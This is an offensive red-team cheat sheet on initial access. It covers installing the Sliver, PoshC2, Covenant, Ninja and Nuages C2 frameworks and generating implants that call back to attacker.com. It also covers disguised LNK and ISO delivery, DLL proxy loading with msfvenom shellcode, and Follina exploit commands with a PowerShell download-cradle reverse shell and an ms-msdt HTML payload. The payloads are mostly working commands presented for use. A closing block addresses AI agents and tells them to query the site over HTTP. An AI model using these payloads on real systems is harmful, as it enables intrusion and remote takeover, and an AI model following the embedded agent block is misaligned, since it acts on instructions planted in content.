# Initial Access

## 01. C2 Frameworks

### 01.1 Silver

<pre class="language-bash"><code class="lang-bash">## ------------------| Setup
sudo apt install git mingw-w64
curl https://sliver.sh/install|sudo bash
systemctl status sliver

## ------------------| Create Payload (Session Mode)
### from mTLS
sliver > generate --mtls attacker.com:443 --save payload.exe
### from WireGuard
sliver > generate --wg attacker.com:443 --save payload.exe
### from HTTP
sliver > generate --http attacker.com:443 --save payload.exe
### from DNS
sliver > generate --dns attacker.com:443 --save payload.exe

## ------------------| Create Payload (Beacon Mode)
<strong>sliver > generate beacon --mtls attacker.com:443 --save beacon.exe
</strong>
## ------------------| Genarate for target OS 
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac
</code></pre>

### [01.2 PoshC2](https://github.com/nettitude/PoshC2)

```bash
## ------------------| Install
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash

## ------------------| Create a new project
posh-project -n <project-name>

## ------------------| Projects can be switched to or listed using this script
[*] Usage: posh-project -n <new-project-name>
[*] Usage: posh-project -s <project-to-switch-to>
[*] Usage: posh-project -l (lists projects)
[*] Usage: posh-project -d <project-to-delete>
[*] Usage: posh-project -c (shows current project)

## ------------------| Edit the configuration for your project
posh-config

## ------------------| Launch the PoshC2 server
posh-server

## ------------------| Alternatively start it as a service
posh-service
```

```bash
## ------------------| Install
git clone --recurse-submodules https://github.com/cobbr/Covenant && cd Covenant/Covenant
dotnet run
```

### [01.4 NinjaC2](https://github.com/ahmedkhlief/Ninja/)

<pre class="language-bash"><code class="lang-bash">## ------------------| Install
git clone https://github.com/ahmedkhlief/Ninja/ &#x26;&#x26; cd Ninja
chmod +x ./install.sh 
sudo ./install.sh
python3 start_campaign.py
python3 Ninja.py

## ------------------| Folder Structure
<strong>###   agents/ : contains all the raw agents required by Ninja.
</strong>###   core/   : contains all the core scripts to run  Ninja.
###   DA/     : Defense Analysis script will write its output here.
###   downloads/ : all the downloaded files from victim will be here.
###   file/    : files to be uploaded to the victim.
###   images/  : screenshots will be uploaded here .
###   kerberoast/ : kerberoast module will write its  output here.
###   lib/  :  include library used by Ninja C2.
###   Modules/ : Powershell modules can be loaded to the victim .
###   payloads/ : payloads ready tp be used in the campaign.
###   ninja.py  : c2 main script.
###   start_campaign.py : python script to intialize the configuration for campaign.
###   links.txt : file containing words to be used in the call back links
###   install.sh : bash script to install the required 
###   c2-logs.txt : log all commands with its result
</code></pre>

### [01.5 Nuages](https://github.com/p3nt4/Nuages)

```bash
## ------------------| Install
git clone https://github.com/p3nt4/Nuages
cd Nuages/Server/
bash setup.sh
bash start.sh
```

## 02. Delivery and Execution

### 02.1 Genarate Payloads

* Create LNK file

```bash
## ------------------| Setup
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\<filepath>\<filename>.lnk") # Changeme!
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\WordPad.exe"
$link.arguments = "/c start OneDriveStandaloneUpdater.exe"
$link.save()
```

* Packed as ISO

```bash
git clone https://github.com/mgeeky/PackMyPayload && cd PackMyPayload
pip3 install -r requirements.txt
python PackMyPayload.py c:\<filepath>\ c:\<filepath>\<filename>.iso --out-format iso --hide file1,file2
```

### 02.2 [DLL Proxy Loading](https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/)

<pre class="language-bash"><code class="lang-bash">## ------------------| Find the legitimate programe to hijack the DLL
## Find better binary from https://ninite.com
## For example i will use OneDriveStandaloneUpdater.exe as below
copy %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe OneDriveUpdater.exe
## for Bit32
copy "C:\Windows\System32\version.dll" version-org.dll
## for bit64
copy "C:\Windows\SysWOW64\version.dll" version-org.dll

## ------------------| Crafting the proxy payload
### Create simple payload bin
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Proxy Loading worked" -f raw > shellcode.bin
### Download the below repo and complie it.
https://github.com/Flangvik/SharpDllProxy
### Copy the version-org.dll and shellcode.bin inside to the SharpDllProxy
.\SharpDllProxy.exe --dll version-org.dll --payload shellcode.bin
### Open visual studio and Create a new project -> Select C++ --> “Dynamic-link Library (DLL)” template
### The name of the solution should match the original DLL name
### Copy and paste the full content of output_&#x3C;DLLNAME>/&#x3C;DLLNAME>_pragma.c in to the cpp file


<strong>## https://h4rithd.com/blog/dll-proxy-loading/index.html
</strong></code></pre>

## 03. Other

### 03.1 MS-MSDT Follina \[[CVE-2022-30190](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190)]

* Source:
  * <https://github.com/chvancooten/follina.py.git>
  * <https://github.com/JohnHammond/msdt-follina>
  * <https://github.com/JMousqueton/PoC-CVE-2022-30190>
* Exploit

```bash
## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" 

## ------------------| chvancooten
git clone git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
```

* Scheme

```bash
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/redteam/initial-access.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.